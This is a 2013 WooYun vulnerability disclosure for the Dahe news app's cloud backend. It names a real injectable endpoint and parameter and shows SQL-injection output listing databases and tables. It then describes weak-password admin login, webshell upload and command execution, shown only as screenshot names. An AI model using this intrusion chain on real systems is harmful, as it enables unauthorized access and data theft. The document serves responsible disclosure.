当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-043357

漏洞标题:大河网App云客户端1#Sql注入和Getshell

相关厂商:大河网

漏洞作者: zzR

提交时间:2013-11-19 16:39

修复时间:2014-01-03 16:40

公开时间:2014-01-03 16:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-11-19: 细节已通知厂商并且等待厂商处理中
2013-11-19: 厂商已经确认,细节仅向厂商公开
2013-11-29: 细节向核心白帽子及相关领域专家公开
2013-12-09: 细节向普通白帽子公开
2013-12-19: 细节向实习白帽子公开
2014-01-03: 细节向公众公开

简要描述:

从APP到云端,发现sql注入,到后台getshell

详细说明:

APP客户端请求数据如下

GET /wp-admin/dh_banner.php?&classid=25 HTTP/1.1
Host: app.dahe.cn:90
Accept-Encoding: gzip
User-Agent: 大河网 3.0 (iPhone; iPhone OS 7.0.4; zh_CN)
Connection: close
Proxy-Connection: close"

漏洞证明:

1.png


列库

available databases [8]:
[*] app_heda
[*] dahe_news
[*] dahemob
[*] information_schema
[*] mysql
[*] news
[*] performance_schema
[*] test


users

<code>
users.png

</code>
current db库的表

Database: dahe_news
[43 tables]
+--------------------------+
| apprecommend             |
| wp_advert                |
| wp_app                   |
| wp_commentmeta           |
| wp_comments              |
| wp_district              |
| wp_em_bookings           |
| wp_em_events             |
| wp_em_locations          |
| wp_em_meta               |
| wp_em_tickets            |
| wp_em_tickets_bookings   |
| wp_favorates             |
| wp_geturl                |
| wp_iphone_push           |
| wp_links                 |
| wp_listcontent           |
| wp_message               |
| wp_options               |
| wp_phone_activity        |
| wp_phone_activity_member |
| wp_phone_activity_prize  |
| wp_phone_attachment      |
| wp_phone_pic             |
| wp_phone_pic_sort        |
| wp_postmeta              |
| wp_posts                 |
| wp_prize                 |
| wp_publishnews           |
| wp_publishtype           |
| wp_push                  |
| wp_site                  |
| wp_subject               |
| wp_subject_c             |
| wp_subject_column        |
| wp_term_relationships    |
| wp_term_taxonomy         |
| wp_terms                 |
| wp_user_like_log         |
| wp_user_point_days_log   |
| wp_user_point_rule       |
| wp_usermeta              |
| wp_users                 |
+--------------------------+


wp的后台

http://app.dahe.cn:90/wp-login.php


找个用户弱口令进去

.png


admins

admins.png


拿shell

shell.png


命令执行

com.png


修复方案:

shell已删
云端安全不容忽视

版权声明:转载请注明来源 zzR@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2013-11-19 16:42

厂商回复:

非常感谢,我们抓紧处理。

最新状态:

暂无

漏洞评价:

评论

  1. 2013-11-19 16:39 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    帅气!

  2. 2013-11-19 16:40 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    @Finger 3Q baby

  3. 2013-11-19 16:43 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    今天这是怎么了,都是3分钟确认的节奏

  4. 2013-11-19 16:53 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | 一切语言转汇编理论)

    nice

  5. 2013-11-19 17:21 | yhoojj ( 普通白帽子 | Rank:110 漏洞数:14 | BurNing)

    @zzR 终于圆满了噻

  6. 2013-11-19 17:26 | 灬相随灬 ( 普通白帽子 | Rank:369 漏洞数:68 | 大胆天下去得,小心寸步难行。)

    怎么都是app,看了APP有前途啊~~

  7. 2013-11-19 17:46 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    @灬相随灬 现在app这个途茎安全重视程度还不够,问题多才正常

  8. 2013-12-09 16:44 | 灬相随灬 ( 普通白帽子 | Rank:369 漏洞数:68 | 大胆天下去得,小心寸步难行。)

    @zzR 坐等公开学习

  9. 2014-01-03 17:23 | Mr.leo ( 普通白帽子 | Rank:1314 漏洞数:176 | 说点神马呢!!)

    @zzR 大妞,另辟蹊径呀

  10. 2014-01-03 17:26 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    @Mr.leo -0-别闹